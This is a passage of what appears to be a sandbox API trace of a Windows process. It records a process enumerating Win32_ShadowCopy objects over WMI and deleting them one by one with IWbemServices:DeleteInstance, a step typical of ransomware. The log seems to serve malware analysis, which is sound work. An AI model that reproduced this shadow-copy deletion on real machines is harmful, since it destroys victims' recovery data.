ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0128.565] IUnknown:QueryInterface (in: This=0x1c90a8c0, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0128.566] IUnknown:AddRef (This=0x1c90a8c0) returned 0x3 [0128.566] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0128.566] IUnknown:QueryInterface (in: This=0x1c90a8c0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c90a8c8) returned 0x0 [0128.566] IMarshal:GetUnmarshalClass (in: This=0x1c90a8c8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0128.566] IUnknown:Release (This=0x1c90a8c8) returned 0x3 [0128.566] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0128.566] IUnknown:AddRef (This=0x1c90a8c0) returned 0x4 [0128.566] IUnknown:QueryInterface (in: This=0x1c90a8c0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0128.566] IUnknown:Release (This=0x1c90a8c0) returned 0x3 [0128.566] IUnknown:Release (This=0x1c90a8c0) returned 0x2 [0128.566] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0128.567] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0128.567] IUnknown:AddRef (This=0x1c90a8c0) returned 0x3 [0128.567] IUnknown:QueryInterface (in: This=0x1c90a8c0, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c90a8c0) returned 0x0 [0128.567] IUnknown:Release (This=0x1c90a8c0) returned 0x3 [0128.567] IUnknown:Release (This=0x1c90a8c0) returned 0x2 [0128.567] IUnknown:Release (This=0x1c90a8c0) returned 0x1 [0128.567] CoTaskMemFree (pv=0x1b77f8d0) [0128.567] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0128.567] IUnknown:AddRef (This=0x1c90a8c0) returned 0x2 [0128.567] IWbemClassObject:Get (in: This=0x1c90a8c0, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0128.568] IWbemClassObject:Get (in: This=0x1c90a8c0, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0128.568] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"") returned 0x53 [0128.568] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0128.568] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0128.568] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0128.568] IUnknown:Release (This=0x212498) returned 0x1 [0128.568] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c90a190) returned 0x0 [0128.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c90a190, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0128.569] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c90a190, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903250) returned 0x0 [0128.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903250, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903250) returned 0x0 [0128.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903250, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0128.569] WbemDefPath:IUnknown:AddRef (This=0x1c903250) returned 0x3 [0128.569] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0128.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903250, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b7934b0) returned 0x0 [0128.570] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b7934b0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0128.570] WbemDefPath:IUnknown:Release (This=0x1b7934b0) returned 0x3 [0128.570] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0128.570] WbemDefPath:IUnknown:AddRef (This=0x1c903250) returned 0x4 [0128.570] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903250, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0128.570] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x3 [0128.570] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x2 [0128.570] WbemDefPath:IUnknown:Release (This=0x1c90a190) returned 0x0 [0128.570] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x1 [0128.570] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0128.570] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0128.570] WbemDefPath:IUnknown:AddRef (This=0x1c903250) returned 0x2 [0128.570] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903250, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903250) returned 0x0 [0128.571] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x2 [0128.571] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x1 [0128.571] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0128.571] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0128.571] WbemDefPath:IUnknown:AddRef (This=0x1c903250) returned 0x2 [0128.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903250, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903250) returned 0x0 [0128.571] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x2 [0128.571] WbemDefPath:IUnknown:AddRef (This=0x1c903250) returned 0x3 [0128.571] WbemDefPath:IWbemPath:SetText (This=0x1c903250, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"") returned 0x0 [0128.571] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x2 [0128.571] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0128.571] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0128.571] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0128.572] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0128.572] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0128.572] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0128.572] IWbemClassObject:Get (in: This=0x1c90a8c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0128.572] SysStringLen (param_1="root\\cimv2") returned 0xa [0128.572] IWbemClassObject:Get (in: This=0x1c90a8c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0128.572] SysStringLen (param_1="root\\cimv2") returned 0xa [0128.572] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0128.572] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0128.572] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0128.572] IWbemClassObject:Get (in: This=0x1c90a8c0, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0128.572] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0128.572] IWbemClassObject:Get (in: This=0x1c90a8c0, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0128.572] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0128.575] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903250, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0128.575] WbemDefPath:IWbemPath:GetText (in: This=0x1c903250, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0128.575] WbemDefPath:IWbemPath:GetText (in: This=0x1c903250, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"") returned 0x0 [0128.575] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0128.575] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0128.575] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0128.575] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0128.575] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0128.575] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0128.575] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0128.575] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0128.575] IWbemClassObject:Get (in: This=0x1c90a8c0, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0128.575] WbemDefPath:IWbemPath:GetText (in: This=0x1c903250, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0128.576] WbemDefPath:IWbemPath:GetText (in: This=0x1c903250, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"") returned 0x0 [0128.576] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0129.694] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0129.694] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x1c90af10, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0129.696] IUnknown:QueryInterface (in: This=0x1c90af10, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c90af10) returned 0x0 [0129.696] IUnknown:QueryInterface (in: This=0x1c90af10, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0129.696] IUnknown:QueryInterface (in: This=0x1c90af10, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0129.696] IUnknown:AddRef (This=0x1c90af10) returned 0x3 [0129.697] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0129.697] IUnknown:QueryInterface (in: This=0x1c90af10, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c90af18) returned 0x0 [0129.697] IMarshal:GetUnmarshalClass (in: This=0x1c90af18, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0129.697] IUnknown:Release (This=0x1c90af18) returned 0x3 [0129.697] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0129.697] IUnknown:AddRef (This=0x1c90af10) returned 0x4 [0129.697] IUnknown:QueryInterface (in: This=0x1c90af10, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0129.697] IUnknown:Release (This=0x1c90af10) returned 0x3 [0129.698] IUnknown:Release (This=0x1c90af10) returned 0x2 [0129.698] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0129.698] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0129.698] IUnknown:AddRef (This=0x1c90af10) returned 0x3 [0129.698] IUnknown:QueryInterface (in: This=0x1c90af10, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c90af10) returned 0x0 [0129.698] IUnknown:Release (This=0x1c90af10) returned 0x3 [0129.698] IUnknown:Release (This=0x1c90af10) returned 0x2 [0129.698] IUnknown:Release (This=0x1c90af10) returned 0x1 [0129.698] CoTaskMemFree (pv=0x27f6b0) [0129.698] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0129.698] IUnknown:AddRef (This=0x1c90af10) returned 0x2 [0129.699] IWbemClassObject:Get (in: This=0x1c90af10, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0129.699] IWbemClassObject:Get (in: This=0x1c90af10, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0129.699] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"") returned 0x53 [0129.699] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0129.699] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0129.699] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0129.699] IUnknown:Release (This=0x212498) returned 0x1 [0129.700] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c90a250) returned 0x0 [0129.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c90a250, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0129.700] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c90a250, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903310) returned 0x0 [0129.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903310, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903310) returned 0x0 [0129.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903310, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0129.701] WbemDefPath:IUnknown:AddRef (This=0x1c903310) returned 0x3 [0129.701] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0129.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903310, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 